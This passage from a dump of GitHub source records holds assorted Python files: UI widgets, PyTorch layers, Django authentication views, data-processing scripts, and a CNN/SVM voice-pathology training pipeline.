set_color(self, color: tuple[int, int, int]) -> None:\n \"\"\" Changes the color of the text.\n\n :param color: The color of the text.\n \"\"\"\n self.color = color\n self.pre_render()\n\n def pre_render(self) -> None:\n \"\"\"\n Renders the text to a buffer.\n \"\"\"\n self.rendered_lines = []\n for line in self.lines:\n self.rendered_lines.append(self.font.render(line, False, self.color))\n\n def update(self, events: list[event.Event]) -> None:\n \"\"\" Updates the text display.\n\n :param events: A list of the lastly pulled events.\n \"\"\"\n pass\n\n def render(self, surface: Surface) -> None:\n \"\"\" Renders the text to the specified surface.\n\n :param surface: The surface on which to render the text.\n \"\"\"\n if self.animated and self.current_lines != self.lines:\n if self.apparition_time == -1:\n self.apparition_time = time()\n self.current_lines = [\"\" for _ in range(len(self.lines))]\n\n amount = floor((time() - self.apparition_time) * self.speed)\n for i in range(len(self.lines)):\n if amount >= len(self.lines[i]):\n self.current_lines[i] = self.lines[i]\n amount -= len(self.lines[i])\n else:\n self.current_lines[i] = self.lines[i][:amount]\n 
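## this line is only partially revealed on this frame, so stop here: later\n## lines stay hidden until the time-based character budget (\"amount\") reaches them.\n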
break\n\n self.rendered_lines = []\n for line in self.current_lines:\n self.rendered_lines.append(self.font.render(line, False, self.color))\n\n offset = self.render_position.y + (self.render_height - (sum([line.get_height() + 16 for line in self.rendered_lines]) - 16)) / 2\n for line in self.rendered_lines:\n surface.blit(line, (self.render_position.x + (self.render_width - line.get_width()) / 2, offset))\n offset += line.get_height() + 16\n","repo_name":"L0UARN/boring-dungeon","sub_path":"source/ui/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":3653,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"28821679960","text":"from captcha.image import ImageCaptcha\nfrom gen_image import __gen_random_captcha_text\nfrom config import MAX_CAPTCHA\n\ndef create_image():\n a = 0\n while a < 100:\n i = str(a)\n image = ImageCaptcha(width=160, height=60, font_sizes=[35])\n text = __gen_random_captcha_text(size=MAX_CAPTCHA)\n image.write(text,\"./image/\"+ i +\".png\")\n a += 1\n\nif __name__ == '__main__':\n create_image()\n","repo_name":"barnett1995/CNN_captcha","sub_path":"gen_captcha/gen_test_image.py","file_name":"gen_test_image.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"70836195564","text":"import math\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.init as init\nimport torch.nn.functional as F\nfrom torch import Tensor\n\nclass SparseDropout(nn.Module):\n def __init__(self, p):\n super().__init__()\n self.p = p\n\n def forward(self, input):\n input_coal = input.coalesce()\n drop_val = F.dropout(input_coal._values(), self.p, self.training)\n return torch.sparse.FloatTensor(input_coal._indices(), drop_val, input.shape)\n\nclass MixedDropout(nn.Module):\n def __init__(self, p):\n super().__init__()\n self.dense_dropout = nn.Dropout(p)\n self.sparse_dropout = SparseDropout(p)\n\n def forward(self, input):\n if input.is_sparse:\n return self.sparse_dropout(input)\n else:\n return self.dense_dropout(input)\n\nclass BackwardLinear(nn.Module):\n __constants__ = ['in_features', 'out_features']\n in_features: int\n out_features: int\n weight: Tensor\n\n def __init__(self, in_features, out_features, bias):\n super(BackwardLinear, self).__init__()\n ## store the layer sizes so that extra_repr() below can report them\n self.in_features = in_features\n self.out_features = out_features\n self.weight = nn.Parameter(torch.FloatTensor(in_features, out_features))\n if bias:\n self.bias = nn.Parameter(torch.FloatTensor(out_features))\n else:\n self.register_parameter('bias', None)\n self.reset_parameters()\n\n def reset_parameters(self):\n init.kaiming_uniform_(self.weight, mode='fan_out', a=math.sqrt(5))\n if self.bias is not None:\n _, fan_out = nn.init._calculate_fan_in_and_fan_out(self.weight)\n bound = 1 / math.sqrt(fan_out) if fan_out > 0 else 0\n init.uniform_(self.bias, -bound, bound)\n\n def forward(self, x):\n if x.is_sparse:\n backward_linear = torch.sparse.mm(x, self.weight)\n else:\n backward_linear = torch.mm(x, self.weight)\n\n if self.bias is not None:\n return torch.add(input=backward_linear, other=self.bias, alpha=1)\n else:\n return backward_linear\n\n def extra_repr(self) -> str:\n return 'in_features={}, out_features={}, bias={}'.format(\n self.in_features, self.out_features, self.bias is not None\n )","repo_name":"hazdzz/PPNP","sub_path":"model/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":2203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} 
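A minimal usage sketch for the layers above (not part of the original repo): it exercises MixedDropout on dense versus sparse inputs and BackwardLinear on a small dense batch. The import path model.layers is an assumption based on this file's location; adjust it to wherever the module actually lives.

## usage_sketch.py -- hypothetical demo; assumes the classes above are importable.
import torch
from model.layers import MixedDropout, BackwardLinear  # assumed import path

torch.manual_seed(0)
x_dense = torch.randn(4, 3)
x_sparse = x_dense.to_sparse()

drop = MixedDropout(p=0.5)
drop.train()                        # dropout only fires in training mode
print(drop(x_dense))                # dense input is routed to nn.Dropout
print(drop(x_sparse).to_dense())    # sparse input drops the stored values only

lin = BackwardLinear(in_features=3, out_features=2, bias=True)
print(lin(x_dense).shape)           # torch.Size([4, 2])
print(lin)                          # extra_repr reports the stored layer sizes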
+{"seq_id":"3167252091","text":"from accounts.models import Accounts\nfrom django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom django.contrib.auth import login, authenticate, logout\nfrom django.conf import settings\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.mail import send_mail, EmailMessage\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.template.loader import render_to_string\nfrom django.utils.http import urlsafe_base64_encode, urlsafe_base64_decode\nfrom django.utils.encoding import force_bytes, force_text\n\nfrom .tokens import generate_token\n\nfrom .forms import RegistrationForm, AccountLoginForm\n\n\n\ndef signup_view(request, *args, **kwargs):\n user = request.user\n if user.is_authenticated: \n return HttpResponse(\"You are already authenticated as \" + str(user.email))\n\n context = {}\n if request.POST:\n form = RegistrationForm(request.POST)\n if form.is_valid():\n \n username = form.cleaned_data.get('username')\n email = form.cleaned_data.get('email').lower()\n raw_password = form.cleaned_data.get('password1')\n first_name = form.cleaned_data.get('first_name')\n last_name = form.cleaned_data.get('last_name')\n form.save()\n #account = authenticate(email=email, password=raw_password)\n #login(request, account)\n #destination = get_redirect_if_exists(request)\n #if destination:\n #\treturn redirect(destination)\n #return redirect('home')\n new_user = Accounts.objects.get(email=email, username=username)\n new_user.first_name = first_name\n new_user.last_name = last_name\n new_user.is_active = False\n\n new_user.save()\n\n current_site = get_current_site(request)\n email_subject = \"Carsify- Confirmation Mail!\"\n message = render_to_string('accounts/email_confirmation.html',{\n 'name': new_user.username,\n 'domain': current_site.domain,\n 'uid': urlsafe_base64_encode(force_bytes(new_user.pk)),\n 'token': generate_token.make_token(new_user)\n })\n email = EmailMessage(\n email_subject, \n message,\n settings.EMAIL_HOST_USER,\n [new_user.email],\n )\n email.fail_silently = True\n email.send()\n\n return render(request, 'accounts/signup_verify.html', {'name': new_user.username})\n\n\n else:\n context['registration_form'] = form\n\n else:\n form = RegistrationForm()\n context['registration_form'] = form\n return render(request, 'accounts/signup.html', context)\n\n\n\n\ndef login_view(request, *args, **kwargs):\n context = {}\n\n user = request.user\n if user.is_authenticated: \n return redirect(\"home:home\")\n\n if request.POST:\n form = AccountLoginForm(request.POST)\n if form.is_valid():\n email = request.POST['email']\n password = request.POST['password']\n user = authenticate(email=email, password=password)\n\n if user:\n login(request, user)\n destination = get_redirect_if_exists(request)\n if destination:\n return redirect(destination)\n return redirect(\"home:home\")\n else:\n context['login_form'] = form\n \n else:\n form = AccountLoginForm()\n context['login_form'] = form\n\n return render(request, \"accounts/login.html\", context)\n\n\n\n\n@login_required\ndef logout_view(request):\n\tlogout(request)\n\treturn redirect(\"home:home\")\n\n\n\ndef get_redirect_if_exists(request):\n\tredirect = None\n\tif request.GET:\n\t\tif request.GET.get(\"next\"):\n\t\t\tredirect = str(request.GET.get(\"next\"))\n\treturn redirect\n\n\n\n\ndef verify(request):\n return render(request, 'accounts/signup_verify.html')\n\n\n\n\ndef activate(request, uidb64, token):\n try:\n uid = 
force_text(urlsafe_base64_decode(uidb64))\n new_user = Accounts.objects.get(pk=uid)\n\n except (TypeError, ValueError, OverflowError, Accounts.DoesNotExist):\n new_user = None\n\n if new_user is not None and generate_token.check_token(new_user, token):\n new_user.is_active = True\n new_user.save() \n return redirect('accounts:login')\n else:\n return HttpResponse(\"Activation Failed!\")","repo_name":"vimal-11/django-custom-authentication","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"36092491722","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Sep 11 08:45:24 2022\r\n\r\n@author: vande\r\n\r\n*******\r\nVisually, after running the program, the 3-second rule\r\nis inaccurate from about 103 km/h. This is also shown below. \r\n\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\na = 0.7\r\nb = 0.08\r\n\r\nx_ms = np.linspace(0,1000,1001) # for accuracy\r\nx_kmh = x_ms * 3.6 # metres per second * 3.6 = km/h \r\n\r\nstort_array = np.array([]) # to collect the values where f1(v) \r\n # is greater than f2(v)\r\n\r\n# print(x_kmh)\r\n\r\n# two formulas for stopping distance:\r\n# stopping distance = reaction distance + braking distance\r\n# We need two functions: f1 and f2\r\n# The curves S1 and S2 show f1 and f2 respectively\r\n\r\ndef f1(v): #plotted in red\r\n # total stopping distance\r\n lengde_totalt = (a*v) + b*(v**2)\r\n return lengde_totalt\r\n\r\ndef f2(v): #plotted in green\r\n # s = v*t \r\n lengde_totalt = v * 3 # multiplying speed by seconds gives metres\r\n return lengde_totalt\r\n\r\n\"\"\"\r\n\r\nWhen the values from f1(v) exceed f2(), the 3-second rule\r\nno longer works. I use a for loop because I cannot know \r\nwhether the values are exactly equal at any index. I therefore look for when the \r\nstopping-distance values from f1() exceed the values from f2(). That gives me \r\nthe speed (km/h) at which the stopping distance from f1() is greater than f2()\r\n\r\nI then collect all such values into a new array and check \r\nthe first value in that array. That is the relevant value \r\nfor when f1() is greater than f2(). \r\n\r\nSetting f1 equal to f2, i.e. 3v = av + bv^2, gives:\r\nv(0.08v - 2.3) = 0 ; this is solved by simple algebra, there being no constant term.\r\n\r\nv = 0 or 0.08v = 2.3\r\n0.08v = 2.3 gives v = 28.75\r\n\r\nthe variable krysning gives the answer 28.8 when f1>f2. \r\n\r\n\"\"\"\r\n\r\nfor i in x_kmh:\r\n if f1(i+1) > f2(i+1):\r\n stort_array = np.append(stort_array, i)\r\n \r\n else:\r\n pass\r\n \r\nkrysning = stort_array[0]\r\nprint(krysning)\r\n\r\nprint(\"The speed at which the 3-second rule\")\r\nprint(\"stops working is\", round(krysning,2)*3.6, \"km/h\")\r\nprint(\"See also the plot for where the green and red curves cross.\")\r\n \r\n\r\n \r\n# The following snippet is based on an example from temp.py by the course teacher\r\n# and has been modified so that it displays the plot correctly. 
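# Analytic cross-check: setting f1(v) = f2(v), i.e. a*v + b*v**2 = 3*v, gives\r\n# v = (3 - a)/b = (3 - 0.7)/0.08 = 28.75 m/s, or 28.75*3.6 = 103.5 km/h,\r\n# which matches the crossing that the loop above finds numerically.\r\n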
\r\n\r\nplt.close('all')\r\nplt.figure(1)\r\nplt.plot(x_kmh*3.6, f1(x_kmh), 'r', label='S1: stopping-distance formula')\r\nplt.plot(x_kmh*3.6, f2(x_kmh), 'g', label='S2: stopping distance, 3-second rule') \r\nplt.axvline(x = (krysning*3.6), color = \"b\", label = \"Crossing of S1 and S2\")\r\nplt.legend()\r\nplt.title('Actual stopping distance vs. the 3-second rule')\r\nplt.xlabel('Speed m/s')\r\nplt.ylabel('Stopping distance m')\r\n# plt.xlim(0, 150)\r\n# plt.ylim(0, 150)\r\nplt.xlim(0, 150)\r\nplt.ylim(0, 200)\r\nplt.grid()\r\nplt.show()\r\n\r\n\r\n\r\n\r\n","repo_name":"trummar/TBG","sub_path":"python_fil13.py","file_name":"python_fil13.py","file_ext":"py","file_size_in_byte":2801,"program_lang":"python","lang":"no","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73661905324","text":"from pyspark.sql.functions import *\nfrom pyspark.sql import *\nfrom pyspark.sql.types import IntegerType\n\nspark = SparkSession.builder.master(\"local\").appName(\"test\").getOrCreate()\nsc = spark.sparkContext\ndata=\"C:\\\\bigdata\\\\datasets\\\\empdata.txt\"\ndf=spark.read.format(\"csv\").option(\"header\",\"true\").option(\"inferSchema\",\"true\").load(data)\nimport re\ncols=[re.sub('[^a-zA-Z]','',x.lower()) for x in df.columns]\nndf=df.toDF(*cols)\n#ndf.show()\nres=ndf.select([regexp_replace(col(x),'\"','').alias(x) for x in ndf.columns])\nres.show(truncate=False)\nres1=res.withColumn('hiredate',to_date(ltrim(col(\"hiredate\")),\"d-MMM-yy\"))\n#res=res1.withColumn(\"hiredate\", to_date(ltrim(col(\"hiredate\")),\"d-MMM-yy\")).withColumn(\"sal\",col(\"sal\").cast(IntegerType()))\n#res1.printSchema()\nres1.show()\n\n","repo_name":"SrikanthGaddam1/pysparkpoc","sub_path":"spark-warehouse/sree123/sparkdata functions1.py","file_name":"sparkdata functions1.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"41370785338","text":"import sys\nfrom PyQt6.QtWidgets import QWidget, QStackedWidget, QListWidget, QHBoxLayout, QApplication, QFormLayout, QLineEdit, QRadioButton, QLabel, QCheckBox\nfrom PyQt6.QtCore import Qt\nfrom PyQt6.QtGui import QPen, QPainter, QImage, QCursor\n\nclass stackedExample(QWidget):\n\n def __init__(self):\n super(stackedExample, self).__init__()\n self.leftlist = QListWidget ()\n self.leftlist.insertItem (0, 'Contact' )\n self.leftlist.insertItem (1, 'Personal' )\n self.leftlist.insertItem (2, 'Educational' )\n\t\t\n self.stack1 = QWidget()\n self.stack2 = QWidget()\n\t\t\n self.stack1UI()\n self.stack2UI()\n\t\t\n self.Stack = QStackedWidget (self)\n self.Stack.addWidget (self.stack1)\n self.Stack.addWidget (self.stack2)\n\t\t\n hbox = QHBoxLayout(self)\n hbox.addWidget(self.Stack)\n hbox.addWidget(self.leftlist)\n\n self.setLayout(hbox)\n self.leftlist.currentRowChanged.connect(self.display)\n self.setGeometry(300, 50, 10,10)\n self.setWindowTitle('StackedWidget demo')\n self.show()\n\t\t\n def stack1UI(self):\n layout = QFormLayout()\n layout.addRow(\"Name\",QLineEdit())\n layout.addRow(\"Address\",QLineEdit())\n #self.setTabText(0,\"Contact Details\")\n self.stack1.setLayout(layout)\n\t\t\n def stack2UI(self):\n layout = QFormLayout()\n sex = QHBoxLayout()\n sex.addWidget(QRadioButton(\"Male\"))\n sex.addWidget(QRadioButton(\"Female\"))\n layout.addRow(QLabel(\"Sex\"),sex)\n layout.addRow(\"Date of Birth\",QLineEdit())\n\t\t\n self.stack2.setLayout(layout)\n\n\n def display(self,i):\n self.Stack.setCurrentIndex(i)\n\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex 
= stackedExample()\n sys.exit(app.exec())\n","repo_name":"Yrrrrrf/project-canvas","sub_path":"pyQt6/q_staked_widget.py","file_name":"q_staked_widget.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37543999583","text":"# ===============================================\n# Import Packages which needs to tune\nimport matplotlib\nmatplotlib.use(\"Agg\")\n\n\n# ===============================================\n# Import Packages and Functions\nfrom keras import backend as K\nfrom matplotlib import pyplot as plt\nfrom CNN import myCNN\nfrom splitData import splitData\nfrom evaluateSVM import evaluateSVM\nfrom evaluateCNN import evaluateCNN\nfrom keras.models import Model, load_model\nfrom getCombination import getCombination\nfrom loadMelSpectrogram import loadMelSpectrogram\nfrom supportVectorMachine import mySVM\nfrom sklearn.model_selection import KFold\nimport numpy as np\nimport tensorflow as tf\nimport os\nimport math\nimport pickle\n\n\n# ===============================================\n# Stop the terminal printing garbage\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"2\"\n\n\n# ===============================================\n# GPU Setting\ngpu_taken = 0.4\ngpu_options = tf.GPUOptions(per_process_gpu_memory_fraction = gpu_taken)\nsess = tf.Session(config = tf.ConfigProto(gpu_options = gpu_options))\n\n\n# ===============================================\n# Environment\nparent_path = \"/home/hguan/7100-Master-Project/Dataset-\"\nslash = \"/\"\n\n\n# ===============================================\n# Dsp Initialization, num_rows = num_MFCCs (not aggregated)\nfs = 16000\nfft_hop = 128\nfft_length = 512\nmel_length = 128\nsnippet_hop = 100\nsnippet_length = 500\nnum_time_frames = math.ceil(snippet_length / 1000 * fs / fft_hop)\n\n\n# ===============================================\n# Dataset Initialization, dataset = Spanish or KayPentax\nclasses = [\"Normal\", \"Pathol\"]\ninput_type = \"MelSpectrogram\"\ndataset_name = \"KayPentax\"\ndataset_path = parent_path + dataset_name\ndata_file_name = \"MelSpectrogram_\" + str(snippet_length) + \"ms_\" + str(snippet_hop) + \"ms\" + \"_block\" + str(fft_length) + \"_hop\" + str(fft_hop) + \"_mel\" + str(mel_length)\naug_dict_file_name = \"Dictionary_\" + str(snippet_length) + \"ms_\" + str(snippet_hop) + \"ms\" \nunaug_dict_file_name = \"Dictionary_\" + str(snippet_length) + \"ms_\" + str(snippet_hop) + \"ms\" + \"_unaugmented\" \n\n\n# ===============================================\n# Training / Cross-Validation Initialization\nnum_folds = 5 \ntraining_percent = 90\ntrain_on_augmented = True\n\n\n# ===============================================\n# CNN Architecture Initialization\nnum_channel = 4\ninput_shape = (int(mel_length / num_channel), math.ceil(snippet_length / 1000 * fs / fft_hop), num_channel)\nFC_num_neuron_list = [1024, 512, 256, 128, 64, 32, 16, 8, 4]\nCNN_architecture_package = [input_shape, FC_num_neuron_list]\n\n\n# ===============================================\n# CNN Training Initialization, metric = \"acc\" for keras\nmetric = \"acc\"\nbatch_size = 4096\nepoch_limit = 10000000\nadam_beta_1 = 0.9\nadam_beta_2 = 0.999\nlearning_rate = 0.0001\nloss_function = \"mean_squared_error\"\nshuffle_choice = True\ntraining_verbose = 0\nCNN_training_package = [learning_rate, epoch_limit, batch_size, metric, shuffle_choice, loss_function, adam_beta_1, adam_beta_2, training_verbose]\n\n\n# ===============================================\n# CNN 
Callbacks Initialization\ncallbacks_mode = \"min\"\nsaved_model_name = \"best_model_this_fold.hdf5\"\ncallbacks_monitor = \"val_loss\"\ncallbacks_verbose = 0\nif_only_save_best = True\ncallbacks_patience = 30\nval_loss_plot_name = \"Val_Loss_Plot_\"\ncallbacks_min_delta = 0.0001\nCNN_callbacks_package = [saved_model_name, callbacks_mode, callbacks_monitor, callbacks_patience, callbacks_min_delta, callbacks_verbose, if_only_save_best]\n \n\n# ===============================================\n# SVM Initialization\nc_values = [0.1, 1, 10, 100]\nsvm_verbose = 0\nsvm_tolerance = 0.001\nsvm_max_iteration = 1000\nsvm_training_package = [c_values, svm_verbose, svm_tolerance, svm_max_iteration]\n\n\n\n# ===============================================\n# Result Representation Initialization\nfile_results_CNN = []\nsnippet_results_CNN = []\ntotal_file_con_mat_CNN = np.array([[0,0],[0,0]])\ntotal_snippet_con_mat_CNN = np.array([[0,0],[0,0]])\n\n\n# ===============================================\n# Result Representation Initialization\nfile_results_SVM = []\nsnippet_results_SVM = []\ntotal_file_con_mat_SVM = np.array([[0,0],[0,0]])\ntotal_snippet_con_mat_SVM = np.array([[0,0],[0,0]])\n\n\n# ===============================================\n# Loading Pickle\ntemp_file_1 = open(dataset_path + slash + data_file_name + \".pickle\", \"rb\") \ntemp_file_2 = open(dataset_path + slash + aug_dict_file_name + \".pickle\", \"rb\")\ntemp_file_3 = open(dataset_path + slash + unaug_dict_file_name + \".pickle\", \"rb\")\n\n\n# ===============================================\n# Loading data inside Pickles\naug_dict = pickle.load(temp_file_2)\nunaug_dict = pickle.load(temp_file_3)\nmelSpectrogram_data = pickle.load(temp_file_1)\n\n\n# ===============================================\nif train_on_augmented:\n train_dict = aug_dict\nelse:\n train_dict = unaug_dict\n\n\n# ===============================================\n# Load all combos from this dataset, combo = [Name, Class] example: [\"WADFJS\", \"Pathol\"]\nname_class_combo = np.asarray(getCombination(dataset_path, classes, slash))\n\n\n# ===============================================\nnormal_name_class_combo = [x for x in name_class_combo if (x[1] == \"Normal\")]\npathol_name_class_combo = [x for x in name_class_combo if (x[1] == \"Pathol\")]\n\n\n# ===============================================\nnormal_index_array = np.arange(len(normal_name_class_combo))\npathol_index_array = np.arange(len(normal_name_class_combo), len(name_class_combo))\n\n\n# ===============================================\nkf_spliter = KFold(n_splits = num_folds, shuffle = True)\n\n\n# ===============================================\nnormal_split = kf_spliter.split(normal_index_array)\npathol_split = kf_spliter.split(pathol_index_array)\n\n\n# ===============================================\n# Creat N-folds for normal files\nnormal_split_index = []\nfor training_validate_index, test_index in normal_split:\n normal_split_index.append([normal_index_array[training_validate_index], normal_index_array[test_index]])\n\n\n# ===============================================\n# Creat N-folds for pathol files\npathol_split_index = [] \nfor training_validate_index, test_index in pathol_split:\n pathol_split_index.append([pathol_index_array[training_validate_index], pathol_index_array[test_index]])\n \n\n# ===============================================\n# Start to do k-fold Cross Validation\nfor fold_index in range(num_folds):\n\n\n # ===============================================\n print(\"---> Now 
Working On Fold \", fold_index + 1, \" ----------------------------\")\n\n\n # ===============================================\n # For each class, get traininging_validation files and test file\n normal_training_validate_combo = name_class_combo[normal_split_index[fold_index][0]].tolist() \n pathol_training_validate_combo = name_class_combo[pathol_split_index[fold_index][0]].tolist() \n normal_test_combo = name_class_combo[normal_split_index[fold_index][1]].tolist() \n pathol_test_combo = name_class_combo[pathol_split_index[fold_index][1]].tolist() \n\n\n # ===============================================\n # For each class, split traininging data and validation data\n [normal_training_combo, normal_validate_combo, _] = splitData(normal_training_validate_combo, training_percent, 100 - training_percent, 0) \n [pathol_training_combo, pathol_validate_combo, _] = splitData(pathol_training_validate_combo, training_percent, 100 - training_percent, 0)\n \n\n # ===============================================\n # Combine traininging set, validation set, test set\n training_combo = normal_training_combo + pathol_training_combo\n validate_combo = normal_validate_combo + pathol_validate_combo\n test_combo = normal_test_combo + pathol_test_combo\n\n\n # ===============================================\n # Load all the snippet\"s melSpectrograms\n # Training set can use either augmented data or unaugmented data\n # Validation set and test set must use unaugmented data\n training_package = loadMelSpectrogram(training_combo, classes, mel_length, num_time_frames, input_type, melSpectrogram_data, train_on_augmented, train_dict) \n validate_package = loadMelSpectrogram(validate_combo, classes, mel_length, num_time_frames, input_type, melSpectrogram_data, False, unaug_dict) \n test_package = loadMelSpectrogram(test_combo, classes, mel_length, num_time_frames, input_type, melSpectrogram_data, False, unaug_dict)\n \n\n # ===============================================\n # When using this method, we need to use label type 3 which is \"Normal\" vs \"Pathol\"\n # Also need type 1 for test data which is [1, 0] vs [0, 1], and type two, which is 0 vs 1\n training_data, training_label_1, training_label_2, training_label_3, training_dist, _ = training_package\n validate_data, _, validate_label_2, validate_label_3, validate_dist, validate_augment_amount = validate_package\n test_data, _, test_label_2, test_label_3, test_dist, test_augment_amount = test_package\n \n\n # ===============================================\n # Show how many files and snippets in each set\n print(training_dist)\n print(validate_dist)\n print(test_dist)\n\n\n # ===============================================\n # Change the one-channel melspectrogram to multiple-channels\n training_data = training_data.reshape(training_data.shape[0], num_channel, int(training_data.shape[1] / num_channel), training_data.shape[2]) \n validate_data = validate_data.reshape(validate_data.shape[0], num_channel, int(validate_data.shape[1] / num_channel), validate_data.shape[2]) \n test_data = test_data.reshape(test_data.shape[0], num_channel, int(test_data.shape[1] / num_channel), test_data.shape[2]) \n \n \n # ===============================================\n # Rearange tensor\"s dimension\n training_data = np.moveaxis(training_data, 1, -1)\n validate_data = np.moveaxis(validate_data, 1, -1)\n test_data = np.moveaxis(test_data, 1, -1)\n\n\n # ===============================================\n # Train CNN\n training_history = myCNN(training_data, training_label_1, 
training_label_2, \n validate_data, validate_label_2, \n classes,\n CNN_architecture_package,\n CNN_training_package,\n CNN_callbacks_package)\n \n\n # ===============================================\n # Load Trained CNN\n fold_best_CNN = load_model(saved_model_name)\n\n \n # ===============================================\n # save the plot of validation loss\n plt.plot(training_history.history[callbacks_monitor])\n plt.savefig(val_loss_plot_name + str(fold_index + 1) + \".png\")\n plt.clf()\n\n\n # ===============================================\n # First we release the results directly from the CNN \n fold_result_package = evaluateCNN(fold_best_CNN, test_combo, test_data, test_label_3, test_augment_amount, classes)\n\n\n # ===============================================\n # Unpack the evaluation result\n fold_file_acc, fold_file_con_mat, fold_snippet_acc, fold_snippet_con_mat = fold_result_package\n\n \n # ===============================================\n # Print the result for this fold \n print(\"Now we have results directly from the CNN:\")\n print(\"The file macro accuracy for this fold is: \", fold_file_acc)\n print(\"The snippet macro accuracy for this fold is: \", fold_snippet_acc)\n print(\"File confusion matrix for this fold is: \")\n print(fold_file_con_mat)\n print(\"Snippet confusion matrix for this fold is:\")\n print(fold_snippet_con_mat)\n\n\n # ===============================================\n # Update overall results\n file_results_CNN.append(fold_file_acc)\n snippet_results_CNN.append(fold_snippet_acc)\n\n\n # ===============================================\n # Update overall confusion matrix\n total_file_con_mat_CNN = total_file_con_mat_CNN + fold_file_con_mat\n total_snippet_con_mat_CNN = total_snippet_con_mat_CNN + fold_snippet_con_mat\n\n\n\n # ===============================================\n # Start to select the best dimension for this fold\n fold_best_file_acc = 0\n for dimension in FC_num_neuron_list:\n\n\n # ===============================================\n # Form a feature extractor from the trained CNN \n index = FC_num_neuron_list.index(dimension)\n cur_extractor = Model(inputs = fold_best_CNN.inputs, \n outputs = fold_best_CNN.layers[-1 - index].output)\n\n \n # ===============================================\n # Get encoded training data and validate data \n training_data_CNNed = cur_extractor.predict(training_data)\n validate_data_CNNed = cur_extractor.predict(validate_data)\n \n \n # ===============================================\n # Train SVMs, search the best parameters\n cur_SVM = mySVM(training_data_CNNed, training_label_3,\n validate_data_CNNed, validate_label_3,\n svm_training_package, classes)\n \n \n # ===============================================\n # Check how good is this encoding dimension perform on the validation set\n cur_result_package = evaluateSVM(cur_SVM, validate_combo, \n validate_data_CNNed, validate_label_3, \n validate_augment_amount, classes)\n \n\n # ===============================================\n cur_file_acc, _, _, _, = cur_result_package\n \n\n # ===============================================\n # if current result is good enough on the validation set\n # Then we keep current encoder + SVM as our best model combination\n if cur_file_acc > fold_best_file_acc:\n fold_best_SVM = cur_SVM\n fold_best_file_acc = cur_file_acc\n fold_best_dimension = dimension\n fold_best_extractor = cur_extractor\n\n \n # ===============================================\n # Print dimension searching result\n print(\"For this fold, the best 
encoder's dimension is: \", fold_best_dimension)\n\n \n # ===============================================\n # Prepare \"CNNed\" test set\n test_data_CNNed = fold_best_extractor.predict(test_data)\n\n\n # ===============================================\n # Test our best model combination\n fold_result_package = evaluateSVM(fold_best_SVM, test_combo, \n test_data_CNNed, test_label_3, \n test_augment_amount, classes)\n\n\n # ===============================================\n # Unpack the evaluation result\n fold_file_acc, fold_file_con_mat, fold_snippet_acc, fold_snippet_con_mat = fold_result_package\n \n \n # ===============================================\n # Print the result for this fold\n print(\"After searching the best extractor, we have the following result: \")\n print(\"The file macro accuracy for this fold is: \", fold_file_acc)\n print(\"The snippet macro accuracy for this fold is: \", fold_snippet_acc)\n print(\"File confusion matrix for this fold is:\")\n print(fold_file_con_mat)\n print(\"Snippet confusion matrix for this fold is:\")\n print(fold_snippet_con_mat)\n\n\n # ===============================================\n # Update overall results\n file_results_SVM.append(fold_file_acc)\n snippet_results_SVM.append(fold_snippet_acc)\n\n\n # ===============================================\n # Update overall confusion matrix\n total_file_con_mat_SVM = total_file_con_mat_SVM + fold_file_con_mat\n total_snippet_con_mat_SVM = total_snippet_con_mat_SVM + fold_snippet_con_mat\n\n\n\n # ===============================================\n # Clean almost everything for last fold, otherwise computer might crash\n K.clear_session()\n tf.reset_default_graph()\n os.remove(saved_model_name)\n print(\"Memory Cleared, Saved Model Removed\")\n\n\n# ===============================================\n# Show Final Results after cross-validation\n# Classification Accuracy for each fold (file level)\nprint(\"Now showing the result if we use CNN directly: \")\nprint(\"--------------------------------\")\nprint(\"file results\")\nprint(file_results_CNN)\nprint(sum(file_results_CNN) / len(file_results_CNN))\n\n\n# ===============================================\n# Show Final Results after cross-validation\n# Classification Accuracy for each fold (snippet level)\nprint(\"--------------------------------\")\nprint(\"snippet results\")\nprint(snippet_results_CNN)\nprint(sum(snippet_results_CNN) / len(snippet_results_CNN))\n\n\n# ===============================================\n# Macro Accuracy for the whole experiment (file level)\nprint(\"--------------------------------\")\nprint(\"final file results\")\nprint(total_file_con_mat_CNN)\n\n\n# ===============================================\nfile_overall_acc = 0;\nfor i in range(len(total_file_con_mat_CNN[0])):\n file_overall_acc = file_overall_acc + total_file_con_mat_CNN[i][i] / sum(total_file_con_mat_CNN[i])\nprint(file_overall_acc / len(classes))\n\n\n# ===============================================\n# Macro Accuracy for the whole experiment (snippet level)\nprint(\"--------------------------------\")\nprint(\"final snippet results\")\nprint(total_snippet_con_mat_CNN)\n\n\n# ===============================================\nsnippet_overall_acc = 0;\nfor i in range(len(total_snippet_con_mat_CNN[0])):\n snippet_overall_acc = snippet_overall_acc + total_snippet_con_mat_CNN[i][i] / sum(total_snippet_con_mat_CNN[i])\nprint(snippet_overall_acc / len(classes)) \n\n\n# ===============================================\n# Show Final Results after cross-validation\n# 
